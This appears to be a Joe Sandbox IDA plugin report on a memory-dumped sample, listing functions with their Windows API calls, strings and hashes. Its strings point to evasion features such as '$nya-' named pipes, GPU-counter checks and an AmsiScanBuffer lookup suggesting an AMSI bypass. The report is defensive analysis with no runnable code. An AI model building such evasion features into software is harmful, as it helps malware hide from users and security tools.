Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: a5c45dab3155b6c991891678dd58d5a22b4f13704b35a24c459ad954c5f5ad16
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: D831C336F00B60A6E725CF13A8147D9A3A0F788BE9F64492DDE4983626EF38C5568340

Function 00000192916234B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000019291623516
GetProcessHeap.KERNEL32 ref: 0000019291623527
HeapAlloc.KERNEL32 ref: 0000019291623535
PdhGetCounterInfoW.PDH ref: 000001929162354B
StrCmpW.SHLWAPI ref: 0000019291623560

Part of subcall function 0000019291623950: StrCmpNW.SHLWAPI ref: 0000019291623972
Part of subcall function 0000019291623950: StrStrW.SHLWAPI ref: 0000019291623990
Part of subcall function 0000019291623950: StrToIntW.SHLWAPI ref: 00000192916239B7

GetProcessHeap.KERNEL32 ref: 000001929162358D
HeapFree.KERNEL32 ref: 000001929162359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000019291623559

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 098585d96da86d639e7812abdcc007cb79738faa2ce067683ede1bbfbdf0cd6e
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: AF318531F10B61A6E714DF23A86479963A0FB88FD9F64452DDE5A93726EF38C446C700

Function 00000192913B962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000192913B9689

Part of subcall function 00000192913BA544: __GetUnwindTryBlock.LIBCMT ref: 00000192913BA587
Part of subcall function 00000192913BA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000192913BA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000192913B9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000192913B99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000192913B9ABC

Strings

csm, xrefs: 00000192913B96A3
csm, xrefs: 00000192913B9784
csm, xrefs: 00000192913B970A

Memory Dump Source

Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: b267186a362d2326fa44231677e7708c08cc401f65cdca4405a91bc5fbc23dcc
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: A3D18D72644BA0AAEB60AF66D4A13FD77B0F74578CF20021DEE8957B96EB34C191C704

Function 000001929162104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000192916210B1
RegEnumValueW.ADVAPI32 ref: 0000019291621117
GetProcessHeap.KERNEL32 ref: 000001929162115A
HeapAlloc.KERNEL32 ref: 0000019291621168
GetProcessHeap.KERNEL32 ref: 0000019291621185
HeapFree.KERNEL32 ref: 0000019291621193

Strings

d, xrefs: 00000192916210D6

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 20172e70724608b3d921a8a4b822df295001e9e79b2439f32521e0b4b072609c
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 78418033614B90EAEB64CF22E45439E77A1F388B9DF648129DA8A47758DF38C549CB40

Function 0000019291622518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001929162252D
GetCurrentProcessId.KERNEL32 ref: 0000019291622537
CreateFileW.KERNEL32 ref: 0000019291622568
WriteFile.KERNEL32 ref: 0000019291622590
ReadFile.KERNEL32 ref: 00000192916225AF
CloseHandle.KERNEL32 ref: 00000192916225B8

Strings

\\.\pipe\$nya-childproc, xrefs: 0000019291622549

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 84f67da5e404501b2db620a26e1dd7d35bc2c1f01f744208fa30bd007382449b
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 55115132A1875093E710CB22F564799B770F389BD8FA44319EA6943BA9CF3DC145CB40

Function 00000192913B7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000192913B7078
__scrt_acquire_startup_lock.LIBCMT ref: 00000192913B70CA
_RTC_Initialize.LIBCMT ref: 00000192913B70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000192913B711E
__scrt_release_startup_lock.LIBCMT ref: 00000192913B7149

Memory Dump Source

Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: e4df7934f2bfe9540c618133e6a55415b2694d319898266e397df482bbbd2916
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 0C81C030681261A6FA55BB2798723F926B1FB8678CF34401DDE09473D7FB38C9868758

Function 0000019291627C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000019291627C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000019291627CCA
_RTC_Initialize.LIBCMT ref: 0000019291627CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000019291627D1E
__scrt_release_startup_lock.LIBCMT ref: 0000019291627D49

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: c2c23c6fe5d79aad3ad6b1815b7abb3826e0db2e841c23d5f5a6b25331c937b6
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: F081E631F04671A6FA589B679872BE962D4BBA578CF748C1DDA48C73D7DB38C8428300

Function 0000019291629AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629B31
GetLastError.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629B3F
LoadLibraryExW.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629B69
FreeLibrary.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629BD7
GetProcAddress.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629BE3

Strings

api-ms-, xrefs: 0000019291629B51

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 1114f637684ca4c47877a52a6281eb1b61b3513ecdc5bad1e740d58a87b5ecb2
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: D031EA31B12770A1FE199B1398207D62394FB86BA9FB9092CDD2D87792DF38C445C310

Function 0000019291633400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000019291633431
GetLastError.KERNEL32 ref: 000001929163343D
CloseHandle.KERNEL32 ref: 0000019291633455
CreateFileW.KERNEL32 ref: 0000019291633480
WriteConsoleW.KERNEL32 ref: 000001929163349F

Strings

CONOUT$, xrefs: 0000019291633461

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 49aaa5bbbb1d3f00cf529decf75059e89793bce3eab839c2c2e3cf8f493465fd
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 82118231B10B6096E7508B53E864799A7A0F788FE8F644328EE6E87BD6CF39C4458740

Function 0000019291626270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000192916262AB
GetThreadContext.KERNEL32 ref: 0000019291626415

Part of subcall function 00000192916260A0: GetCurrentThreadId.KERNEL32 ref: 00000192916260A4

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 4c9dcfce2016a6dfc4527a94d6cbf59325f9ca53b0a36dc8978e79ecd8756171
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: AFD1C036605BA891DA74CB07E4A439A77A0F3C8B88F604516EECD877AACF3DC541CB00

Function 0000019291622098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000192916220A6
TlsFree.KERNEL32 ref: 000001929162225F
TlsFree.KERNEL32 ref: 000001929162226B
TlsFree.KERNEL32 ref: 0000019291622277
TlsFree.KERNEL32 ref: 0000019291622283
TlsFree.KERNEL32 ref: 000001929162228F

Part of subcall function 0000019291625E50: GetCurrentThreadId.KERNEL32 ref: 0000019291625E66

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 850918002e21a7f5e285b56f3926d197a4402c3c96ef0bc89b6c20af32f41744
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 7D51E534A01B65A5EB19DB26EC713E423A1FB0474CFA04C1DE96D867ABEF78D529C340

Function 00000192916235C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000192916224D1), ref: 00000192916235EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000192916224D1), ref: 00000192916235FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000192916224D1), ref: 0000019291623673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000192916224D1), ref: 00000192916236D9
HeapFree.KERNEL32(?,?,?,?,?,00000192916224D1), ref: 00000192916236E7

Strings

$nya-, xrefs: 000001929162366C

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 9c06e46c4587c023cc9fab938f4280c33fd663232faa7e8ee5abe3fa34d6c7ee
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: C031B831B01B75A3EB29DF17D5647A963A4FB48B98F28482CDF4987B56EF34C4628700

Function 000001929162C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001929162C94F
SetLastError.KERNEL32 ref: 000001929162C96E
FlsSetValue.KERNEL32 ref: 000001929162C997
FlsSetValue.KERNEL32 ref: 000001929162C9A8
FlsSetValue.KERNEL32 ref: 000001929162C9B9

Part of subcall function 000001929162D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001929162674A), ref: 000001929162D2B6
Part of subcall function 000001929162D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001929162674A), ref: 000001929162D2C0

SetLastError.KERNEL32 ref: 000001929162C9DC

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 2ccd2ed0913545e511c864f292ee58e74d2d1674f55bc5cf354694a3b8dffcf5
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 1C114231F0167062F61C677364353EE1151BB86BA8F748A2CE976963CBCE38D4018300

Function 0000019291623E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000019291623AAC), ref: 0000019291623E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000019291623AAC), ref: 0000019291623E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000019291623AAC), ref: 0000019291623E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000019291623AAC), ref: 0000019291623E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000019291623AAC), ref: 0000019291623E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000019291623AAC), ref: 0000019291623EAE

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: f83d95b8783258dd4d4cd13628dbd287f1fe86aa22e897dc2fa1a9e33723fe51
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: A6018074B0175092FB249B23E8A939573A0BB48B59F24042DC99D073A6EF3EC049C700

Function 0000019291621AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000019291621AF4
StrCmpNIW.SHLWAPI ref: 0000019291621B0E
lstrlenW.KERNEL32 ref: 0000019291621B1D
StrCpyW.SHLWAPI ref: 0000019291621B32

Strings

\\?\, xrefs: 0000019291621B02

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 25313a90cd123075b52064f9d3ea821d62aaa47f9db7c20868b3536d277eb7c0
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: FAF0C872704694A2FB208B22F5E43D96370F744B8DFD44029DA5983555EF7DC68AC700

Function 000001929162B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001929162B929
GetProcAddress.KERNEL32 ref: 000001929162B93F
FreeLibrary.KERNEL32 ref: 000001929162B95B

Strings

CorExitProcess, xrefs: 000001929162B938
mscoree.dll, xrefs: 000001929162B920

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 78c398a1b69a2899a42dece84219ee9bb31329a9e634dc818e3a1fb80ac8e76c
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: F4F09631F0061161EA148B1698A43A95360FB85769FA4061DDA79461E6CF3CC44AC700

Function 0000019291623708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001929162275A), ref: 000001929162372A
StrCpyW.SHLWAPI ref: 000001929162373A
StrCatW.SHLWAPI ref: 0000019291623746
PathCombineW.SHLWAPI(?,?,00000000,000001929162275A), ref: 0000019291623754

Strings

\\.\pipe\, xrefs: 0000019291623720

Memory Dump Source

Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true

Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 0045c7096d6791fdcc58602e75d69d7d4bca24c5b5ddf06a83b739e43f229b14
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: A5F08274B04BA0A1FE049B13B9241E96260FB4CFC8F648039EE2A47B1ADF3CC4468700

Function 0000019291621E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0000019291621E47
GetProcAddress.KERNEL32 ref: 0000019291621E57
Sleep.KERNEL32 ref: 0000019291621E67

Strings

amsi.dll, xrefs: 0000019291621E40
AmsiScanBuffer, xrefs: 0000019291621E50

